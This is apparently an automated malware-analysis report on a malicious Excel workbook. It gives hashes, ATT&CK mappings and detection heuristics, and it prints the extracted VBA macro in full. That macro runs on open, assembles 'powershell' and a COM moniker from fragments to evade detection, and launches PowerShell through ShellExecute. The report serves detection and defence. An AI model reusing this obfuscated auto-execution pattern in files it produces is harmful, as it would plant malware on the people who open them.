Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 764b351509404abd…

MALICIOUS

Office (OOXML)

Size: 13.4 KB
Created: 2021-06-08 07:44:17 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-17
MD5: 4e2474e2ef34d800d79503603c10db1f
SHA-1: ef4b9efc5a1de556139fb9705f03b4f0af49ffd1
SHA-256: 764b351509404abd9c5a59f5c10a748bf8937e1678fee0320d1c83514d166b74
Risk score: 108

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an OOXML (Excel) workbook containing a VBA macro in the ThisWorkbook module that is automatically executed via the AutoOpen subroutine. The macro assembles the string 'powershell' from two fragments and a 'new:<CLSID>' moniker from three fragments, obtains a COM object by passing that moniker to GetObject, and then calls the object's Document.Application.ShellExecute method to launch PowerShell, likely to download and execute a second-stage payload. The combination of an AutoOpen entry point and a GetObject call strongly suggests malicious intent.

Heuristics 4

  • VBA project inside OOXML (severity: medium; 3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call (severity: high) OLE_VBA_GETOBJ
    GetObject call
    Matched lines in script:
        ggwp = gg & wp
        Set obj = GetObject(p4)
        obj.Document.Application.ShellExecute ggwp, Null, , Null, 1
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
        Attribute VB_Customizable = True
        Sub AutoOpen()

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename            Kind          Source                                                            Size
macros.bas          vba-macro     oletools.olevba.extract_macros (decoded VBA source from OOXML)    1043 bytes
    SHA-256: eb1cad18f533ad2a2022a3290dd11f7b6948107d720d4afc2988db88367e37f9

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()

    Dim gg As String
    Dim wp As String
    Dim ggwp As String
    Dim p1 As String
    Dim p2 As String
    Dim p3 As String
    Dim p4 As String
    gg = "powers"
    wp = "hell"
    p1 = "new:C08AFD"
    p2 = "90-F2A1-11D1-845"
    p3 = "5-00A0C91F3880"
    p4 = p1 & p2 & p3
    ggwp = gg & wp
    Set obj = GetObject(p4)
    obj.Document.Application.ShellExecute ggwp, Null, , Null, 1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename            Kind          Source                                                            Size
vbaProject_00.bin   vba-project   OOXML VBA project: xl/vbaProject.bin                              14848 bytes
    SHA-256: 65e91a375d269b7291b77d72ebfd500bc1df075e9631250248df3fde5f890e2f